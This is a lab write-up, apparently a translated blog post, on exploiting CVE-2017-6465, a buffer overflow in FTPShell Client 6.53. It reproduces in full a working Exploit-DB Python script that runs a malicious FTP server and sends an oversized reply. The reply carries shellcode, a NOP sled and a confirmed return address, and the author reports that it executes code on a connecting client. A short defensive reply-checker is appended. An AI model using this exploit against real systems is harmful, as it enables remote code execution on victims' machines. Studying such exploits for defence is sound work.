CVE-2017-6465: FTPShell Client 6.53 Buffer Overflow Exploitation


 

0x00. Introduction

  FTPShell is a fairly popular FTP tool for the Windows platform developed abroad. As of this writing the latest client release is 6.53, available from: http://www.ftpshell.com/downloadclient.htm#

  Lab environment: VMWare + WinXP SP3 EN

  Vulnerable app download: http://www.ftpshell.com/downloadclient.htm#

 

0x01. Exploitation

  This buffer overflow occurs while the client is initializing its authenticated connection to the FTP server. First, install FTPShell Client 6.53 in the lab environment.


  Here we simply use the Python code published on Exploit-DB to stand up a malicious FTP server:

# Exploit Title: FTPShell Client 6.53 buffer overflow on making initial connection
# Date: 2017-03-04
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://www.ftpshell.com/downloadclient.htm
# Version: Windows Server 2008 R2 x64
# Tested on: Windows Server 2008 R2 Standard x64
# CVE: CVE-2017-6465
# 2017-03-04: Software vendor notified
# 2017-03-06: No reply
# 2017-03-06: Publishing

# Written for Python 2, where str is a byte string (socket.send() takes bytes).
import socket
import sys

shell=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48"
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48"
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43"
"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57"
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b"
"\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46"
"\x4e\x36\x43\x46\x42\x50\x5a")    # replace this with shellcode that pops calc.exe

port = 21

try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("0.0.0.0", port))  # bind local port 21
        s.listen(5)          # start listening as an FTP server
        print("[i] FTP server started on port: "+str(port)+"\r\n")
except:
        print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
        sys.exit(1)  # nothing to accept on if the bind failed


# 004b95dc in ftpshell.exe PUSH ESI ; RETN
eip = "\xdc\x95\x4b"  # this address still works on WinXP SP3 EN
nops = "\x90"*8
junk = "A"*(400-len(nops)-len(shell))
buffer = nops + shell + junk + eip  # build the malicious buffer layout

while True:
    conn, addr = s.accept()
    conn.send("220 Welcome to your unfriendly FTP server\r\n")
    print(conn.recv(1024))
    conn.send("331 OK\r\n")
    print(conn.recv(1024))
    conn.send("230 OK\r\n")
    print(conn.recv(1024))
    conn.send("220 "+buffer+" is current directory\r\n")  # send the malicious buffer

  Run the script to start the server.


   When the FTPShell client on the victim machine connects to the malicious FTP server, the client immediately reports an error and the shellcode is executed.
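As an added defender-side example (not part of the original post or of the Exploit-DB code): a small checker for server-to-client FTP control traffic that flags reply lines long enough or odd enough to trip a client like this one. The 256-byte threshold and the sample traffic are constructed for this example.

```python
import re

# RFC 959 reply line: three-digit code, then " " (single/final line) or "-"
# (first line of a multi-line reply), then free text.
REPLY_RE = re.compile(rb"^(\d{3})([ -])(.*)$", re.DOTALL)

# Assumed threshold for this example: the affected client falls over on a
# ~400-byte reply, and legitimate banners are far shorter than this.
MAX_REPLY_TEXT = 256

def analyze_ftp_replies(stream):
    """Scan server->client FTP control bytes and return (code, reason) findings
    for replies that a fragile client might mishandle."""
    findings = []
    pending = None  # code of a multi-line reply still waiting for its last line
    for raw in stream.split(b"\r\n"):
        if not raw:
            continue
        m = REPLY_RE.match(raw)
        if pending is None and m is None:
            findings.append(("???", "malformed reply line (%d bytes)" % len(raw)))
            continue
        if pending is None:  # start of a new reply
            code, text = m.group(1), m.group(3)
            if m.group(2) == b"-":
                pending = code
        else:  # inside a multi-line reply: lines need not carry a code
            code, text = pending, raw
            if m and m.group(1) == pending and m.group(2) == b" ":
                pending, text = None, m.group(3)
        code = code.decode()
        if len(text) > MAX_REPLY_TEXT:
            findings.append((code, "oversized reply text (%d bytes)" % len(text)))
        # Reply text should be printable ASCII; raw opcodes or high bytes in
        # a banner are a strong indicator of an embedded payload.
        if any((b < 0x20 and b != 0x09) or b >= 0x7f for b in text):
            findings.append((code, "non-printable bytes in reply text"))
    return findings

# Constructed sample traffic (not a real capture): a normal login exchange,
# then one whose 220 line is padded well past any sane banner length.
BENIGN = b"220-Welcome\r\nto the lab server\r\n220 ready\r\n331 OK\r\n230 OK\r\n"
SUSPICIOUS = (b"220 Welcome\r\n331 OK\r\n230 OK\r\n"
              b"220 " + b"A" * 420 + b"\x90\x90" + b" is current directory\r\n")

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, analyze_ftp_replies(sample))
```

The same function can be pointed at a pcap-extracted control stream or wired into a proxy that drops the connection on the first finding.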


   Note: I have not tested this on Win2008 SP2.

 

0x02. References

  Exploit-DB: https://www.exploit-db.com/exploits/41511/
